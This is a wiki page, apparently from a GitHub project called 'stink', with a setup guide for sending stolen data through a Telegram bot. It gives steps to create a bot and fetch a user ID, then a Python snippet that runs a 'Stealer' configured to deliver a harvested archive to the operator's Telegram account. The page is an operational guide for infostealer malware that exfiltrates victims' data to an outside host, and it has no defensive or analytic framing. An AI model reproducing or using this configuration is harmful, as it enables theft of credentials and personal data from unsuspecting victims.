-
Notifications
You must be signed in to change notification settings - Fork 54
Telegram bot
Astaroth edited this page May 13, 2023
·
4 revisions
A guide on how to set up data sending via the Telegram bot.
- Open a chat with BotFather.
- Write the command
/newbot
.
- Write the name of the bot, then the nickname with the attribute
_bot
at the end.
- Insert the resulting token into the
YOUR_TOKEN
field in the script.
- Open a chat with Get My ID.
- Write the command
/start
.
- Insert the resulting ID into the
YOUR_ID
field in the script.
After that, you need to write any message to the bot, so he can send you the archive.
from stink import Stealer, Senders
if __name__ == '__main__':
Stealer(senders=[Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID)]).run()